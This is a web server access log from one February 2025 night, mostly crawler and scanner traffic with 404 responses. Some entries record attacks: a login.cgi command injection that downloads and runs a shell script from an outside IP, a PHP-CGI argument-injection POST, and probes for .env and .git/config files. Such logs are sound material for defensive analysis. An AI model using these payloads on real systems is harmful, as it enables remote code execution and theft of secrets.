103.210.120.62 - - [11/Feb/2025:01:01:49 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
156.59.198.136 - - [11/Feb/2025:01:03:17 +0100] "GET /renault.2web.at/htdocs/binaries/renault-/rs-74-2016winter-check-und-service-tageanmeldungdoc.doc HTTP/1.0" 404 338 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
176.56.182.155 - - [11/Feb/2025:01:06:14 +0100] "GET /%7Eridersde/joomla/index.php HTTP/1.0" 404 386 "http://coffeenostra.castlegem.co.uk/%7Eridersde/joomla/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
176.56.182.155 - - [11/Feb/2025:01:06:14 +0100] "GET / HTTP/1.0" 200 423 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
125.227.40.5 - - [11/Feb/2025:01:06:20 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.135 - - [11/Feb/2025:01:07:17 +0100] "GET /renault.activities.at/htdocs/binaries/10277440.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [11/Feb/2025:01:11:33 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.136 - - [11/Feb/2025:01:15:17 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/table.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.75.134.199 - - [11/Feb/2025:01:15:45 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
156.59.198.136 - - [11/Feb/2025:01:20:10 +0100] "GET /renault.activities.at/htdocs/binaries/10044340.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:01:49:45 +0100] "GET /document.xml HTTP/1.0" 404 286 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [11/Feb/2025:01:53:05 +0100] "GET / HTTP/1.0" 200 423 "-" "Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1"
156.59.198.135 - - [11/Feb/2025:01:53:45 +0100] "GET /renault.2web.at/htdocs/binaries/10006727.doc HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:01:57:46 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/right.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:02:01:48 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/bold.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:02:05:49 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/label.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:02:09:50 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/unorderedlist.gif HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.160.138 - - [11/Feb/2025:02:10:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [11/Feb/2025:02:10:55 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
193.68.89.10 - - [11/Feb/2025:02:13:19 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [11/Feb/2025:02:13:50 +0100] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolCalendar/info.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:02:17:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104261503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.165.16.10 - - [11/Feb/2025:02:21:23 +0100] "\x03" 400 383 "-" "-"
156.59.198.135 - - [11/Feb/2025:02:21:50 +0100] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20230924035604.xml HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.181.187.69 - - [11/Feb/2025:02:24:32 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.136 - - [11/Feb/2025:02:25:50 +0100] "GET /renault.2web.at/htdocs/binaries/renault-/rs-129-fr.doc HTTP/1.0" 404 310 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:02:29:50 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/textarea.gif HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:02:33:50 +0100] "GET /renault.activities.at/htdocs/binaries/renault-/rs-155-fr.doc HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [11/Feb/2025:02:48:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
112.46.217.13 - - [11/Feb/2025:02:49:18 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
87.120.113.33 - - [11/Feb/2025:02:49:23 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 2.3.3; en-us ; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1/UCBrowser/8.6.1.262/145/355"
176.65.137.206 - - [11/Feb/2025:03:00:33 +0100] "GET /api.config HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64)"
176.65.137.206 - - [11/Feb/2025:03:00:38 +0100] "GET /api.config HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64)"
156.59.198.135 - - [11/Feb/2025:03:03:48 +0100] "GET /renault.2web.at/htdocs/binaries/10656106.doc HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:03:07:48 +0100] "GET /renault.activities.at/htdocs/binaries/10008563.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:03:11:48 +0100] "GET /ed-test.2web.at/stats/lang/awstats-eu.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:03:15:49 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/cut.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:03:19:49 +0100] "GET /renault.activities.at/htdocs/binaries/10197159.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:03:23:51 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/search.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:03:27:51 +0100] "GET /ed-test.2web.at/stats/lang/awstats-he.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [11/Feb/2025:03:29:20 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.136 - - [11/Feb/2025:03:42:45 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/input.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:03:46:45 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/div.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:03:50:46 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/tablehigh.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:03:54:46 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/position.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:04:10:48 +0100] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolImageView/styles/hay/hay.xml HTTP/1.0" 404 335 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [11/Feb/2025:04:10:57 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.196.220.253 - - [11/Feb/2025:04:10:59 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.136 - - [11/Feb/2025:04:14:47 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/filelist.xml HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:04:18:47 +0100] "GET /ed-test.2web.at/stats/lang/awstats-cy.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:04:23:04 +0100] "GET /renault.activities.at/htdocs/binaries/10688680.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:04:46:36 +0100] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolImageView/styles/outlook/outlook.xml HTTP/1.0" 404 339 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [11/Feb/2025:04:49:37 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [11/Feb/2025:04:50:36 +0100] "GET /ed-test.2web.at/stats/lang/awstats-dk.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [11/Feb/2025:04:53:23 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
156.59.198.135 - - [11/Feb/2025:05:04:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107281603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:05:37:09 +0100] "GET /renault.activities.at/htdocs/binaries/10485654.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:05:41:09 +0100] "GET /ed-test.2web.at/stats/lang/awstats-cn.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:05:45:09 +0100] "GET /renault.activities.at/htdocs/binaries/10015819.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.121.133.117 - - [11/Feb/2025:05:57:14 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [11/Feb/2025:06:05:11 +0100] "GET /renault.activities.at/htdocs/binaries/10089015.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:06:13:12 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/selectall.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:06:17:13 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/rule.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:06:21:13 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/anchor.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:06:25:14 +0100] "GET /renault.activities.at/htdocs/binaries/10069848.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:06:29:14 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/help.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:06:33:15 +0100] "GET /renault.activities.at/htdocs/binaries/10656106.doc HTTP/1.0" 404 310 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.101.122.229 - - [11/Feb/2025:06:36:57 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
156.59.198.135 - - [11/Feb/2025:06:37:15 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/neu.gif HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:06:41:15 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/tm_create.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:06:45:16 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/image.gif HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:06:49:17 +0100] "GET /ed-test.2web.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:06:53:17 +0100] "GET /ed-test.2web.at/stats/lang/awstats-hu.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
176.65.137.206 - - [11/Feb/2025:07:07:01 +0100] "GET /api.config HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64)"
176.65.137.206 - - [11/Feb/2025:07:07:07 +0100] "GET /api.config HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64)"
179.43.160.138 - - [11/Feb/2025:07:09:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.248.165.93 - - [11/Feb/2025:07:14:23 +0100] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
156.59.198.135 - - [11/Feb/2025:07:20:20 +0100] "GET /ed-test.2web.at/stats/lang/awstats-cz.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:07:24:20 +0100] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/API.md HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.148.10.186 - - [11/Feb/2025:07:31:43 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Android 6.0.1; Mobile; rv:48.0) Gecko/48.0 Firefox/48.0"
45.148.10.186 - - [11/Feb/2025:07:31:47 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12"
156.59.198.136 - - [11/Feb/2025:07:34:31 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/superscript.gif HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.156.105.22 - - [11/Feb/2025:08:00:09 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9"
156.59.198.136 - - [11/Feb/2025:08:21:26 +0100] "GET /renault.activities.at/htdocs/binaries/10126848.doc HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:08:25:26 +0100] "GET /renault.activities.at/htdocs/binaries/10197031.doc HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [11/Feb/2025:08:43:56 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
138.121.25.114 - - [11/Feb/2025:08:45:40 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
170.64.216.84 - - [11/Feb/2025:08:48:07 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
184.105.139.69 - - [11/Feb/2025:08:49:34 +0100] "\x16\x03\x01" 400 383 "-" "-"
115.231.78.11 - - [11/Feb/2025:08:49:51 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36"
115.231.78.11 - - [11/Feb/2025:08:49:52 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
115.231.78.11 - - [11/Feb/2025:08:49:52 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
193.68.89.10 - - [11/Feb/2025:08:55:49 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.132.81 - - [11/Feb/2025:08:56:50 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.141.215.167 - - [11/Feb/2025:09:06:57 +0100] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 404 287 "-" "python-requests/2.32.3"
156.59.198.135 - - [11/Feb/2025:09:10:15 +0100] "GET /renault.activities.at/htdocs/binaries/renault-/rs-129-fr.doc HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [11/Feb/2025:09:14:16 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/broff.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:09:18:16 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011250803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [11/Feb/2025:09:23:13 +0100] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20231019095110.xml HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.121.133.117 - - [11/Feb/2025:09:39:36 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
152.32.173.15 - - [11/Feb/2025:09:41:41 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
152.32.173.15 - - [11/Feb/2025:09:41:42 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
152.32.173.15 - - [11/Feb/2025:09:41:42 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
152.32.173.15 - - [11/Feb/2025:09:41:43 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 8_0; Win64; x64) AppleWebKit/597.35 (KHTML, like Gecko) Chrome/73.0.2996 Safari/537.36"
152.32.173.15 - - [11/Feb/2025:09:41:43 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
152.32.173.15 - - [11/Feb/2025:09:41:44 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
152.32.173.15 - - [11/Feb/2025:09:41:44 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
